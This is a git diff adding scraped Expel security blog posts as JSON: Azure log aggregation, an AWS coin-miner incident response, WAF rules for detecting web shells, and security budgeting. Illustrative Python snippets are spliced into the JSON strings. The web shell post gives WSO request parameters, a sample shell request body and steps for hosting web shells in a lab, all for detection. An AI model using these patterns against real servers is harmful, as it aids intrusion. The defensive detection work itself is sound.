Azure Storage log data is particularly important. This log data is basically a bunch of csv files within Azure Storage itself . If you want to search this data, you have to forward it to a log management solution within the Azure ecosystem \u2013 that means Log Analytics. 
During the development of the integration, the best resource from Microsoft for forwarding logs was to use a PowerShell script to pull storage log data, translate it into JSON format and upload it to a Log Analytics workspace where the data can then be searched or visualized. As of this writing, there is a preview Diagnostic Settings feature for Azure Storage accounts that allows automatic forwarding of logs to ALA via the Azure console. Even though forwarding the logs to ALA is becoming easier, storing these logs in ALA can be expensive. In some cases, our customers would have paid more than $300 a day, or over $100k a year, to store their Azure Storage logs within ALA. Instead of requiring customers to foot the bill for the storage and also adding yet another configuration step, we decided to directly ingest those logs into our own backend log management solution. This helped us solve the cost problem across all our customers with a single solution. A typical approach to solving this problem is to figure out which logs you don\u2019t need and then filter them out prior to ingestion. In the case of Azure Storage, each log entry is a storage operation, so the obvious move would be to drop benign operations during ingestion. This approach is difficult for two reasons. The first is that we\u2019re dealing with a large variety of Azure environments. Determining a set of benign operations may be possible for a single environment but the odds aren\u2019t good for determining benign operations across all customer environments. The second is that these logs helped provide context around detections of anomalous behavior. Removing whole swaths of logs would make understanding what was normal versus abnormal more difficult. To get around this, I worked with D&R to create a log aggregation approach that would decrease the log volume without filtering whole chunks of logs or reducing our context. The idea was that we could determine what log entries pertained to the \u201csame\u201d operation but at different points in time. If the operations were the \u201csame\u201d then we would combine them into a single log record with added operation counts and time windows. Based on the operation type we could loosen or tighten our definition of \u201csame\u201d in order to provide better aggregation performance. In the end, we were able to achieve a 93 percent reduction in volume across all of the storage accounts we were monitoring while still maintaining the contextual value of the logs themselves. This was no small feat considering the diversity of Azure Storage use cases, and thus log content, across our different Azure customers. Estimated costs for searchable Azure Storage logs:
Device | Azure Storage Accounts | Raw volume (MB/day) | Aggregated volume (MB/day) | Raw est. ALA cost ($/yr) | Aggregated est. ALA cost ($/yr) | Reduction (%)
cb7ebb31-c17f-4b73-9962-db585b94f58d | 68 | 173268 | 2917 | 138547 | 2332 | 98.32
6321c95f-b6c9-4e65-9a18-8760a0846387 | 24 | 54551 | 10047 | 43619 | 8033 | 81.58
0c839cc8-90ae-4733-b9f5-992f5461ed2c | 168 | 19287 | 626 | 15422 | 500 | 96.76
afe394af-609e-425f-a075-197047aa1875 | 5 | 15718 | 5027 | 12569 | 4019 | 68.02
f3b0a370-d1d0-4160-a3fc-06d5ed400797 | 7 | 1569 | 9 | 1254 | 7 | 99.45
8e7a3c33-09be-468b-beeb-b51bcc524c06 | 58 | 49 | 13 | 39 | 10 | 73.58
503f94e4-7322-42c2-8794-8cbc51494a2e | 21 | 40 | 17 | 32 | 14 | 56.90
3d77e130-23f9-4db7-a0aa-8212b2f513bd | 2 | 17 | 2 | 14 | 2 | 88.47
1bc7556a-1a54-45f6-979a-77ab57b2af0f | 1 | 16 | 2 | 13 | 1 | 88.68
Above is the table we built internally to track various customer storage costs as we worked to reduce their cost and still capture relevant logs to enable detection and response.
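If you're curious what that aggregation looks like in practice, here's a heavily simplified Python sketch. It's an illustration of the idea rather than our actual pipeline, and the field names are invented for the example: entries that describe the "same" operation (same principal, operation name and status here) are collapsed into one record with a count and a first-seen/last-seen window.

from collections import OrderedDict

def aggregate_storage_logs(entries, key_fields=("principal", "operation", "status")):
    """Collapse storage-operation log entries that share the same key fields
    into one record with an operation count and a first/last timestamp window.
    `entries` is a list of dicts with a 'timestamp' plus the key fields;
    the schema here is illustrative, not the real Azure Storage log format."""
    buckets = OrderedDict()
    for entry in entries:
        key = tuple(entry.get(f) for f in key_fields)
        bucket = buckets.get(key)
        if bucket is None:
            bucket = dict(entry)
            bucket["count"] = 1
            bucket["first_seen"] = bucket["last_seen"] = entry["timestamp"]
            buckets[key] = bucket
        else:
            bucket["count"] += 1
            bucket["first_seen"] = min(bucket["first_seen"], entry["timestamp"])
            bucket["last_seen"] = max(bucket["last_seen"], entry["timestamp"])
    return list(buckets.values())

if __name__ == "__main__":
    logs = [
        {"timestamp": "2021-01-05T10:00:01Z", "principal": "app-svc", "operation": "GetBlob", "status": "Success"},
        {"timestamp": "2021-01-05T10:00:07Z", "principal": "app-svc", "operation": "GetBlob", "status": "Success"},
        {"timestamp": "2021-01-05T10:02:00Z", "principal": "jane", "operation": "PutBlob", "status": "Success"},
    ]
    for record in aggregate_storage_logs(logs):
        print(record["operation"], record["count"], record["first_seen"], "->", record["last_seen"])

Loosening or tightening the bucket key (adding the object name, or a coarse time bucket) is the knob that trades aggregation ratio against context.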
Teamwork: Always Azure bet Our goal is to always provide high-quality alerts with as much context and information to both our analysts and customers. The collective expertise of our teams and their ability to react and solve problems in real-time helped us not only replace the third-party application, but also create an entirely new detection strategy around ASC that improves visibility and coverage for our existing customers, and improves our analysts\u2019 experience \u2013 creating greater efficiency across the board. Remember the feedback loop I mentioned? Like all integrations we build, we don\u2019t consider the integrations to ever truly be complete. There\u2019s always another company behind integrations that is making changes (hopefully improvements) that affect Expel. That\u2019s another reason communicating in real-time is key. Each of Expel\u2019s internal teams have the ability to drive changes to the integration or detection strategy. If you\u2019re considering building your own detections on top of Azure signal, I hope this post gave you a few ideas (and maybe even saved you some time AND money). Want to find out more about Azure signal and log sourcing? Check out our guidebook here ." +} \ No newline at end of file diff --git a/behind-the-scenes-in-the-expel-soc-alert-to-fix-in-aws.json b/behind-the-scenes-in-the-expel-soc-alert-to-fix-in-aws.json new file mode 100644 index 0000000000000000000000000000000000000000..a33b4acf9433743422d9d39c5b118c7c721c90fd --- /dev/null +++ b/behind-the-scenes-in-the-expel-soc-alert-to-fix-in-aws.json @@ -0,0 +1,6 @@ +{ + "title": "Behind the scenes in the Expel SOC: Alert-to-fix in AWS", + "url": "https://expel.com/blog/behind-the-scenes-expel-soc-alert-aws/", + "date": "Jul 28, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Behind the scenes in the Expel SOC: Alert-to-fix in AWS Security operations \u00b7 8 MIN READ \u00b7 JON HENCINSKI, ANTHONY RANDAZZO, SAM LIPTON AND LORI EASTERLY \u00b7 JUL 28, 2020 \u00b7 TAGS: Cloud security / How to / Managed detection and response / Managed security / SOC Over the July 4th holiday weekend our SOC spotted a coin-mining attack in a customer\u2019s Amazon Web Services (AWS) environment. The attacker compromised the root IAM user access key and used it to enumerate the environment and spin up ten (10) c5.4xlarge EC2s to mine Monero . While this was just a coin miner, it was root key exposure. The situation could have easily gotten out of control pretty quickly. It took our SOC 37 minutes to go from alert-to-fix. That\u2019s 37 minutes to triage the initial lead (a custom AWS rule using CloudTrail logs ), declare an incident and tell our customer how to stop the attack. Jon\u2019s take: Alert-to-fix in 37 minutes is quite good. Recent industry reporting indicates that most incidents are contained on a time basis measured in days not minutes. Our target is that 75 percent of the time we go from alert-to-fix in less than 30 minutes. Anything above that automatically goes through a review process that we\u2019ll talk about more in a bit. How\u2019d we pull it off so quickly? Teamwork. We get a lot of questions about what detection and response looks like in AWS, so we thought this would be a great opportunity to take you behind the scenes. In this post we\u2019ll walk you through the process from alert-to-fix in AWS over a holiday weekend. You\u2019ll hear from the SOC analysts and Global Response Team who worked on the incident. 
Before we tell you how it went down, here\u2019s the high level play-by-play: Triage, investigation and remediation timeline Now we\u2019ll let the team tell the story. Saturday, July 4, 2020 Initial Lead: 12:19:37 AM ET By Sam Lipton and Lori Easterly \u2013 SOC analysts Our shift started at 08:45 pm ET on Friday, July 3. Like many organizations, we\u2019ve been working fully remotely since the middle of March . We jumped on the Zoom call for shift handoff, reviewed open investigations, weekly alert trending and general info for situational awareness. Things were (seemingly) calm. We anticipated a quieter shift. On a typical Friday night into Saturday morning, we\u2019ll handle about 100 alerts. It\u2019s not uncommon for us to spot an incident on Friday evening/Saturday morning, but it\u2019s not the norm. It\u2019s usually slower on the weekend; there are fewer active users and devices. Our shift started as we expected, slow and steady. Then suddenly, as is the case in security operations, that all changed. We spotted an AWS alert based on CloudTrail logs that told us that EC2 SSH access keys were generated for the root access key from a suspicious source IP address using the AWS Golang SDK: Initial lead into the AWS coin-mining incident The source IP address in question was allocated to a cloud hosting provider that we hadn\u2019t previously seen create SSH key pairs via the ImportKeyPair API in this customer\u2019s AWS environment (especially from the root account!). The SSH key pair alert was followed shortly thereafter by AWS GuardDuty alerts for an EC2 instance communicating with a cryptocurrency server (monerohash[.]com on TCP port 7777). We jumped into the SIEM, queried CloudTrail logs and quickly found that the EC2 instances communicating with monerohash[.]com were the same EC2 instances associated with the SSH key pairs that were just detected. Corroborating AWS GuardDuty alert As our CTO Peter Silberman says, it was time to buckle up and \u201cpour some Go Fast\u201d on this. We\u2019ve talked about our Expel robots in a previous post . As a quick refresher, our robot Ruxie (yes\u2013 we give our robots names) automates investigative workflows to surface up more details to our analysts. In this event, Ruxie pulled up API calls made by the principal (interesting in this context is mostly anything that isn\u2019t Get*, List*, Describe* and Head*). AWS alert decision support \u2013 Tell me what other interesting API calls this AWS principal made This made it easy for us to understand what happened: The root AWS access key was potentially compromised. The root access key was used to access the AWS environment from a cloud hosting environment using the AWS Golang SDK. It was then used to create SSH keys, spin up EC2 instances via the RunInstances API call and created new security groups likely to allow inbound access from the Internet. We inferred that the root access key was likely compromised and used to deploy coin miners. Yep, time to escalate this to an incident, take a deeper look, engage the customer and notify the on-call Global Response Team Incident Handler. PagerDuty escalation to Global Response Team: 12:37:00 AM ET Our Global Response Team (GRT) consists of senior and principal-level analysts who serve as incident responders for critical incidents. AWS root key exposure introduces a high level of risk for any customer, so we made the call to engage the GRT on call using PagerDuty . 
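As a side note, if you want to reproduce that "interesting API calls" view in your own AWS account, a short boto3 sketch gets you most of the way there. This is an illustration rather than how Ruxie is actually implemented: it looks up recent CloudTrail events for a given access key ID and filters out the read-only Get*/List*/Describe*/Head* calls.

import json
from datetime import datetime, timedelta, timezone

import boto3

READ_ONLY_PREFIXES = ("Get", "List", "Describe", "Head")

def interesting_api_calls(access_key_id, hours=24):
    """Return non-read-only CloudTrail events for an access key over the last N hours."""
    client = boto3.client("cloudtrail")
    end = datetime.now(timezone.utc)
    start = end - timedelta(hours=hours)

    events, token = [], None
    while True:
        kwargs = {
            # lookup_events accepts a single lookup attribute at a time
            "LookupAttributes": [{"AttributeKey": "AccessKeyId", "AttributeValue": access_key_id}],
            "StartTime": start,
            "EndTime": end,
            "MaxResults": 50,
        }
        if token:
            kwargs["NextToken"] = token
        page = client.lookup_events(**kwargs)
        for event in page.get("Events", []):
            if not event["EventName"].startswith(READ_ONLY_PREFIXES):
                detail = json.loads(event["CloudTrailEvent"])  # raw event is a JSON string
                events.append((event["EventTime"], event["EventName"], detail.get("sourceIPAddress")))
        token = page.get("NextToken")
        if not token:
            break
    return events

if __name__ == "__main__":
    for when, name, src_ip in interesting_api_calls("AKIAEXAMPLEKEY"):  # placeholder key ID
        print(when, name, src_ip)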
The escalation goes out to a Slack channel that\u2019s monitored by the management team to track utilization. PagerDuty escalation out to the GRT on-call Incident declaration: 12:39:21 AM ET A few minutes after the initial lead landed in Expel Workbench \u2013 19 minutes to be exact \u2013 we notified the customer that there was a critical security incident in their AWS environment involving the root access key. And that access key was used to spin up new EC2 instances to perform coin mining. Simultaneously, we jumped into our SIEM and queried CloudTrail logs to help answer: Did the attacker compromise any other AWS accounts? How long has the attacker had access? What did the attacker do with the access? How did the attacker compromise the root AWS access key? At 12:56:43 ET we provided the first remediation actions to our customer to help contain the incident in AWS based on what we knew. This included: Steps on how to delete and remove the stolen root access key; and Instructions on how to terminate EC2 instances spun up by the attacker. We felt pretty good at this point \u2013 we had a good understanding of what happened. The customer acknowledged the critical incident and started working on remediation, while the GRT Incident Handler was inbound to perform a risk assessment. Alert-to-fix in 37 minutes. Not a bad start to our shift. Global Response Team enters the chat: 12:42:00 AM ET Follow @amrandazz By Anthony Randazzo \u2013 Global Response Team Lead I usually keep my phone on silent, but PagerDuty has a vCard that allows you to set an emergency contact. This bypasses your phone\u2019s notifications setting so that if you receive a call from this contact, your phone rings (whether it\u2019s in silent mode or not). We call it the SOC \u201c bat phone .\u201d This wasn\u2019t the first time I was paged in the middle of the night. I grabbed my phone, saw the PagerDuty icon and answered. There\u2019s a lot of trust in our SOC. I knew immediately that if I was being paged, then the shift analysts were confident that there was something brewing that needed my attention. I made my way downstairs to my office and hopped on Zoom to get a quick debrief from the analysts about what alerts came in and what they were able to discover through their initial response. Now that I\u2019m finally awake, it\u2019s time to surgically determine the full extent of what happened. As the GRT incident handler, it\u2019s important to not only perform a proper technical response to the incident, but also understand the risk. That way, we can thoroughly communicate with our customer at any given time throughout the incident, and continue to do so until we\u2019re able to declare that the incident is fully contained. At this point, we have the answers to most of our investigative questions , courtesy of the SOC shift analysts: Did the attacker compromise any other AWS accounts? There is no evidence of this. How long has the attacker had access? This access key was not observed in use for the previous 30 days. What did the attacker do with the access? The attacker generated a bunch of EC2 instances and enabled an ingress rule to SSH in and install CoinMiner malware. How did the attacker compromise the root AWS access key? We don\u2019t know and may never know . My biggest concern at this point was communicating to the customer that the access key remediation needs to occur as soon as possible. 
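For anyone who has to run this play themselves, the containment portion is scriptable too. The sketch below is a hedged example rather than a copy of the instructions we sent: the instance and security group IDs are placeholders you would pull from your own investigation, and deleting and replacing the exposed root access key still has to happen separately, per the steps above.

import boto3

def contain_coinminer(instance_ids, security_group_ids, region="us-east-1"):
    """Terminate attacker-launched EC2 instances and delete the security groups
    they created. All IDs are placeholders from your own scoping work."""
    ec2 = boto3.client("ec2", region_name=region)

    if instance_ids:
        # Termination is destructive; snapshot volumes first if you need
        # forensics, or stop and isolate instead of terminating.
        ec2.terminate_instances(InstanceIds=instance_ids)

    for sg_id in security_group_ids:
        # Deleting fails while the group is still attached to an instance,
        # so remove these after the instances are gone.
        ec2.delete_security_group(GroupId=sg_id)

if __name__ == "__main__":
    contain_coinminer(
        instance_ids=["i-0123456789abcdef0"],          # placeholder
        security_group_ids=["sg-0123456789abcdef0"],   # placeholder
    )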
While this attack was an automated coin miner bot, there was still an unauthorized attacker with an intent of financial gain that had root access to an AWS account containing proprietary and potentially sensitive information lurking somewhere. There are a lot of \u201cwhat ifs\u201d floating around in my head. What if the attacker realizes they have a root access key? What if the attacker decides to start copying our customer\u2019s EBS volumes or RDS snapshots? Incident contained: 02:00:00 AM ET By 2:00 am ET we had the incident fully scoped which meant we understood: When the attack started How many IAM principals the attacker compromised AWS EC2 instances compromised by the attacker IP addresses used by the attacker to access AWS (ASN: AS135629) Domain and IP address resolutions to coin mining pool (monerohash[.]com:7777) And API calls made by the attacker using the root access key At this point I focused on using what we understood about the attack to deliver complete remediation steps to our customer. This included: A full list of all EC2 instances spun up by the attacker with details on how to terminate them AWS security groups created by the attacker and how to remove them Checking in on the status of the compromised root access key I provided a summary of everything we knew about the attack to our customer, did one last review of the remediation steps for accuracy and chatted with the SOC over Zoom to make sure we set the team up for success if the attacker came back. For reference, below are the MITRE ATT&CK Enterprise and Cloud Tactics observed during Expel\u2019s response: MITRE ATT&CK Enterprise and Cloud Tactics observed during Expel\u2019s response Initial Access Valid Accounts Execution Scripting Persistence Valid Accounts, Redundant Access Command and Control Uncommonly Used Port With the incident now under control, I resolved the PagerDuty escalation and called it a morning. PagerDuty escalation resolution at 2:07am ET Tuesday, July 7th Follow @jhencinski By Jon Hencinski \u2013 Director of Global Security Operations Critical incident hot wash: 10:00:00 AM ET For every critical incident we\u2019ll perform a lightweight 15-minute \u201chot wash.\u201d We use this time to come together as a team to reflect and learn. NIST has some opinions on what you should ask , at Expel we mainly focus on asking ourselves: How quickly did we detect and respond? Was this within our internal target? Did we provide the right remediation actions to our customer? Did we follow the process and was it effective? Did we fully scope the incident? Is any training required? Were we effective? If not, what steps do we need to take to improve? If you\u2019re looking for an easy way to get started with a repeatable incident hot wash, steal this: Incident hot wash document template. Steal me! The bottom line: celebrate what went well and don\u2019t be afraid to talk about where you need to improve. Each incident is an opportunity to advance your skills and train your investigative muscle. Lessons Learned We were able to help our customer get the situation under control pretty quickly but there were still some really interesting observations: It\u2019s entirely possible that the root access key was scraped and passed off to the bot to spin up miners right before this was detected. We didn\u2019t see any CLI, console or other interactive activity, fortunately. The attacker definitely wasn\u2019t worried about setting off any sort of billing or performance alarms given the size of these EC2s. 
This was the first time we saw an attacker bring their own SSH key pairs that were uniquely named. Usually we see these generated in the bot automation run via the CreateKeyPair API. The CoinMiner was likely installed via SSH remote access (as a part of the bot). We didn\u2019t have local EC2 visibility to confirm, but an ingress rule was created in the bot automation to allow SSH from the Internet. This was also the first time we\u2019d observed a bot written in the AWS Golang software development kit (SDK). This is interesting because as defenders, it\u2019s easy to suppress alerts based on user-agents, particularly SDKs we don\u2019t expect to be used in attacks. We\u2019ll apply these lessons learned, continue to improve our ability to spot evil quickly in AWS and mature our response procedures. While we felt good about taking 37 minutes to go from alert-to-fix in AWS in the early morning hours, especially during a holiday, we don\u2019t plan on letting it get to our heads. We hold that highly effective SOCs are the right combination of people, tech and process. Really great security is a process, there is no end state \u2013 the work to improve is never done! Did you find this behind-the-scenes look into our detection and response process helpful? If so, let us know and we\u2019ll plan to continue pulling the curtain back in the future!" +} \ No newline at end of file diff --git a/better-web-shell-detections-with-signal-sciences-waf.json b/better-web-shell-detections-with-signal-sciences-waf.json new file mode 100644 index 0000000000000000000000000000000000000000..b8bc580abda5b5b24654ec9e9d026ffbbe907ce7 --- /dev/null +++ b/better-web-shell-detections-with-signal-sciences-waf.json @@ -0,0 +1,6 @@ +{ + "title": "Better web shell detections with Signal Sciences WAF", + "url": "https://expel.com/blog/better-web-shell-detections-with-signal-sciences-waf/", + "date": "Oct 9, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Better web shell detections with Signal Sciences WAF Security operations \u00b7 5 MIN READ \u00b7 ALEC RANDAZZO \u00b7 OCT 9, 2019 \u00b7 TAGS: Get technical / How to / Managed security / SOC If you work for an organization that has a web presence (and let\u2019s be real, they almost all do) and that presence is perfectly coded, has zero vulnerabilities and no functions that could be misused \u2026 then you can stop reading. For everyone else, know that there\u2019s a real chance of your website being compromised at some point \u2014 leading to things like website defacement , website functionality modification or a broader compromise of the network . The common theme for these sorts of attacks is web vulnerabilities that lead to the upload of web shells, giving an attacker a foothold on the underlying server. In this blog post, I\u2019ll talk about what a web shell is, some of the typical ways of detecting them and the (vastly improved) detection method I discovered. What\u2019s a web shell? A web shell is a web page or web resource that abuses certain functions in web languages (like PHP, JavaScript, etc.) that give it backdoor-like capabilities to the underlying web server. Capabilities typically include things like file upload, file download, and arbitrary command execution. Web shells usually crop up after a threat actor exploits a website vulnerability, giving the attacker an initial foothold onto a network through the web server. Typical methods of detecting web shells Detection of web shells traditionally comes in two forms, both with downsides.
The first detection method involves detection on the endpoint by file name, file hash, or file content. Unfortunately this is often CPU intensive which means business operations teams may not allow you to do it on production systems. The second method is passive and effective but it\u2019s a pain to set up and manage. It involves mirroring web traffic to a network traffic monitoring device that has built-in detections or supports custom Snort or Suricata rules. You\u2019ll also need to upload your web server SSL private keys to the network appliance(s) for SSL decryption or you won\u2019t be able to inspect encrypted web traffic. I don\u2019t know about you, but that\u2019s not a mess that I\u2019d want to manage or deal with. How Expel uses Signal Sciences WAF to detect web shells One of the commitments we\u2019ve made to our customers since Expel was founded is to support and integrate with the security technologies that our customers already use or plan to buy. Several of our customers use the Signal Sciences Web Application Firewall (WAF) , so we created an easy way to integrate those security signals into Expel Workbench. As we were developing our integration, I discovered that the Signal Science WAF has a great capability to detect web shells thanks to a complete application layer visibility into web traffic with a user-friendly rules engine bolted on top. That\u2019s right \u2014 a rules engine that allows you to key off of web content such as HTTP methods, any header keys and values (even custom headers), query parameter keys and values, post body keys and values, domain, URI, or any combination of the preceding items. This visibility and rules engine allows us to augment customers\u2019 Signal Sciences WAF deployments with granular rules that detect network traffic to popular web shell variants with a high fidelity (meaning it\u2019ll only trigger on the traffic we\u2019re looking for). I\u2019ll pull back the curtain and show you how Expel develops web shell detection rules for its customers so you can try the process yourself with your own Signal Science WAF deployment. How Expel develops web shell detection rules using the Signal Sciences rules engine Here\u2019s a high-level overview of the web shell detection rule development process: Stand up a web server running whatever web language you want to develop rules for and install the Signal Science WAF agent. I started with an Ubuntu server running Apache and PHP. Find some web shells. Thankfully that\u2019s not very hard. Copy web shells you want to write rules for to a directory the web service is serving resources from. Load up a packet capturing tool or my preferred tool, Chrome browser\u2019s built-in developer\u2019s console. Access the web shell and use its various functions, looking for unique indicators in the HTTP requests. Create the rule to detect the web shell in the Signal Science WAF rule editor and hook it up to a signal that would generate an alert. Test out your new rule by interacting with the web shell again, verifying that all the actions you intended to detect are being detected. Now I\u2019ll walk through the specifics of creating a rule for the WSO web shell version 4.0.5 (MD5: b4d3b9dbdd36cac0eba7a598877b6da1 ) starting at step 5 of the process I described above. The following screenshot series will show you how to take different actions through the WSO web shell while having Chrome\u2019s developer console open. You\u2019ll see me: Executing \u201cpwd\u201d to return my present working directory. 
Executing \u201cls\u201d to return a directory listing of my current working directory. Using the built-in function \u201cProcess status\u201d which is a WSO execution wrapper around the shell command \u201cps aux\u201d and Navigating to the root of the server\u2019s file system. In each screenshot below, I added red boxes around the post-body parameters my browser sent to the web shell. Take a peek: Execution of \u201cpwd\u201d to return the present working directory. Execution of \u201cls\u201d to return a list of content in the current working directory. Use of \u201cProcess status\u201d which is a WSO execution wrapper around the shell command \u201cps aux\u201d Navigation to the root of the server\u2019s file system. Each request always had the parameters \u201ca\u201d, \u201cc\u201d, \u201cp1\u201d, \u201cp2\u201d, \u201cp3\u201d and \u201ccharset.\u201d It turns out that all actions taken while using this web shell will have those parameters. If you review other versions of the WSO web shell this\u2019ll also be true. So if you want to generically detect WSO web shell use regardless of version, all you need to do is look for all those parameters being present in a request. Before you write a rule, you need to prepare a few things in the Signal Sciences WAF: Create a \u201csite signal\u201d on each site you want your rules to monitor; your rules will point to this signal. In my example, I called the signal \u201cexpel-alert\u201d. Create a \u201csite alert\u201d that takes in the new signal and set the threshold to one request in one minute. This is the lowest threshold that you can set. Since your WSO web shell rule will be high fidelity, you want an alert generated if that threshold is ever met. Signal Sciences WAF has a powerful feature called \u201cadvanced rules\u201d which Signal Sciences reps can turn on for you. There\u2019s an additional cost, but the feature greatly expands the WAF\u2019s capability. For each Expel customer that has a Signal Sciences WAF, we deploy an advanced rule. This rule turns on verbose logging that records post-body contents and query parameters. We only enable verbose logging on expel-alert signals. This gives us complete visibility into commands sent to a web shell so we can investigate alerts. Now onto the meat of the rule. In the \u201csite rule\u201d editor, you\u2019ll want to chain together \u201cPost Parameter exists where name equals <name>\u201d conditions, one for each of the values \u201ca\u201d, \u201cc\u201d, \u201cp1\u201d, \u201cp2\u201d, \u201cp3\u201d, and \u201ccharset\u201d. Set the rule action to add the signal \u201cexpel-alert\u201d. Take a look at the final rule configuration: The final step is to test the efficacy of your rule by using the web shell some more to see what gets tagged. Take a look at the screenshot below \u2014 every request we made to the web shell was tagged with \u201cexpel-alert\u201d and has its post-body contents logged. Success! Bonus: Free web shell detection rules As a reward for making it through this blog post, I\u2019ve got a prize for you: ten web shell detection rules that you can upload right into your Signal Sciences WAF. They\u2019ll detect WSO, r57, c99, c99 madnet, PAS, China Chopper, B374k, reGeorg and reDuh web shells. There\u2019s also a generic rule to detect some common commands that could be pushed to web shells we don\u2019t have explicit rules for. To download these web shell detection rules, submit your info below and we\u2019ll send it over in an email."
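If you want to sanity-check that detection logic outside of the WAF, the same "all of these post parameters are present" test is easy to express in a few lines of Python. This isn't a Signal Sciences feature, just a small sketch that's handy for dry-running the rule idea against captured request bodies; the sample WSO body below is illustrative.

from urllib.parse import parse_qs

WSO_PARAMS = {"a", "c", "p1", "p2", "p3", "charset"}

def looks_like_wso(post_body):
    """Return True if a URL-encoded POST body carries every parameter name
    that WSO web shell requests always include."""
    # keep_blank_values so empty parameters like p2= and p3= still count
    params = set(parse_qs(post_body, keep_blank_values=True))
    return WSO_PARAMS.issubset(params)

if __name__ == "__main__":
    benign = "username=alice&password=hunter2"
    shell = "a=FilesMan&c=%2Fvar%2Fwww&p1=ls&p2=&p3=&charset=UTF-8"  # illustrative body
    print(looks_like_wso(benign))  # False
    print(looks_like_wso(shell))   # True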
+} \ No newline at end of file diff --git a/blog.json b/blog.json new file mode 100644 index 0000000000000000000000000000000000000000..1bfe4ed03420591e6ecad034abd07164c77562c0 --- /dev/null +++ b/blog.json @@ -0,0 +1,6 @@ +{ + "title": "Blog", + "url": "https://expel.com/blog/page/5/", + "date": null, + "contents": null +} \ No newline at end of file diff --git a/budget-planning-determining-your-security-spend.json b/budget-planning-determining-your-security-spend.json new file mode 100644 index 0000000000000000000000000000000000000000..4b2acd9d71466cd0492115c98f3ba32cfb68b3b1 --- /dev/null +++ b/budget-planning-determining-your-security-spend.json @@ -0,0 +1,6 @@ +{ + "title": "Budget planning: determining your security spend", + "url": "https://expel.com/blog/budget-planning-determining-security-spend/", + "date": "Oct 16, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Budget planning: determining your security spend Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 OCT 16, 2017 \u00b7 TAGS: Budget / Management / Planning It\u2019s a common question: \u201cHow much should I spend on cybersecurity?\u201d Looking at your peers, analyst guidance, and postings on random security companies\u2019 websites, it\u2019s a difficult question. And there\u2019s not a one-size-fits-all answer. It may seem counterintuitive, but how much you spend on security is really a trailing indicator of how your company views security. In corporate life, we\u2019re asked to set a budget long before we\u2019ll actually spend the money. So, we talk to our staff, we talk to company leadership and we attend conferences to figure out what we should be doing about cybersecurity and cyber risk management in our organization. Then we put together a budget, which gets kicked around for a while before it\u2019s eventually approved. A few months later we, start finally spending those budget dollars. But by that time we\u2019re really implementing our vision of security as it was 6 or even 12 months ago. What bucket are you in? What your vision is depends a lot on how your company views cybersecurity. I\u2019ve found most organizations fall into one of five buckets. Do any of these sound familiar? Security as an enabler ($$$$) \u2013 These are businesses that view cybersecurity as a differentiator to their service or product. They\u2019re implementing \u201cleading edge\u201d security solutions in an effort to set them apart from the pack. Risk based ($$$) \u2013 Organizations that have risk-based cybersecurity are constantly making tradeoffs between required security controls and their risk appetite. While spending in these organizations can be high, it\u2019s also organized and controlled. Security as a requirement ($$) \u2013 Some businesses use regulatory and industry requirements to guide their spend. This is often less expensive than a risk-based approach but it won\u2019t have the same coverage of controls. Yet another piece of IT ($) \u2013 In these organizations, security is managed like IT spend, which for the most part means minimizing cost and not pulling from the bottom line. Reactionary ($?*!$) \u2013 This is the \u201clet the winds blow us where they may\u201d strategy of cybersecurity. When things go badly, there\u2019s a large spend. When they go well, the spend is minimal. Real Dollars By now I\u2019m guessing you\u2019ve plotted what bucket your organization is in. But practically, how big are those dollar signs? 
According to Gartner , cybersecurity spend can vary from 1% to 13% of the overall IT budget. That\u2019s a pretty big range that doesn\u2019t speak well to the maturity of the state of the security profession. At the low end of that spend, you\u2019ll have organizations with minimal security controls and security incidents that go undetected and unaddressed for long periods of time. At the high end, you\u2019ve got armies of dedicated staff, heavy tooling and engaged executives sponsoring cybersecurity initiatives. Be aware, though, that absolute dollars are only one measurement. It\u2019s important to understand where this money is being spent\u2026 or more appropriately where it could be spent. Cybersecurity spend comes in many forms including staff, security software, hardware, contractor support, and outside services. Depending on your needs, you\u2019ll get different levels of value from each bucket you spend your dollars in. For instance, in a small organization that is sensitive to hiring more staff, contract support or outside services may be a better bet than ramping up staffing. In larger, more sophisticated organizations, spending on software and hardware that automates existing security controls and processes may be the best thing you can do. Each approach has a different price tag and will affect where you land on the 1% to 13% spectrum. Find your focus (aka it\u2019s all about outcomes) If you\u2019re struggling to figure out what type of security organization you\u2019re trying to be and what your long-term strategy is, my advice is to focus on your desired outcomes \u2013 both in proactive and reactive situations. Ask yourself: \u201cWhat outcomes do I want, and when do they need to be possible?\u201d Combine the answers to help focus your initial budget thinking\u2026 or at least rationalize your planned spend and set company expectations on realistic outcomes. If your budget and expectations don\u2019t match (typically the budget is too small to meet the desired expectations) you need to do one of three things: 1) get more budget, 2) right-size expectations, 3) find a new job proactively because this story won\u2019t end well and you will likely be the scapegoat. Avoiding the trap door when you\u2019re in the breach zone There will always be ebbs and flows when it comes to how much money there is to go around. Everyone has lived through a budget crunch at some point and had to tighten belts and live off less. On the flip side, if you\u2019ve suffered a major security event recently, your budget likely got a bump to help you deal with the breach, response activities, and remediation. I call this the \u201cbreach zone\u201d. If you\u2019ve been there you\u2019ve probably also witnessed the \u201cpanic spending\u201d that typically follows. Spending that windfall quickly is often seen as a proxy for progress. But it can also be a trap that sets you up for failure down the line. Why? Panic spending often results in buying products and services you don\u2019t ultimately get value from. What\u2019s worse is that you\u2019re then stuck paying for those products out into the future \u2013 increasing your long-term budget needs even more with things you don\u2019t need. Not to mention the time it takes to maintain them. It\u2019s a bit like stretching to afford a sports car but then you realize you can\u2019t afford the expensive gas and insurance. A healthier approach is to use the specter of a breach to drive your budgeting process.
If you\u2019re lucky enough to have escaped a breach, congrats. Pretend you have and go back to that outcome-based approach I talked about earlier. What do you need? What would you want to change in your org to achieve them? What investments would you make and what would you do differently? Use those answers to guide your budget process. Scenario based budget planning can help you build a budget for the security you\u2019re likely to need and ensure your spend is on target with what your organization requires in the future. Finding your spend Based on all this, the question still stands: \u201cHow much should I spend on cybersecurity?\u201d The answer to that question is unique to each organization. As I said at the start, there\u2019s no one-size-fits-all answer. It depends on your maturity, current capabilities, executive support, and threat model; you may have wildly different spending needs than your peers. But there are some things you can do to find the budget that\u2019s right for you. Review your past spend and do an assessment. Did you get the results you want? What would you have done differently? Tabletop some terrible events like breaches and insider attacks. What would you need to respond? What would you need to stop it from happening? Use these answers to drive your budget and spending decisions. And remember that your budget is your own. Just because another organization is spending more or less doesn\u2019t matter if you\u2019re getting the results you want." +} \ No newline at end of file diff --git a/cloud-attack-trends-what-you-need-to-know-and-how.json 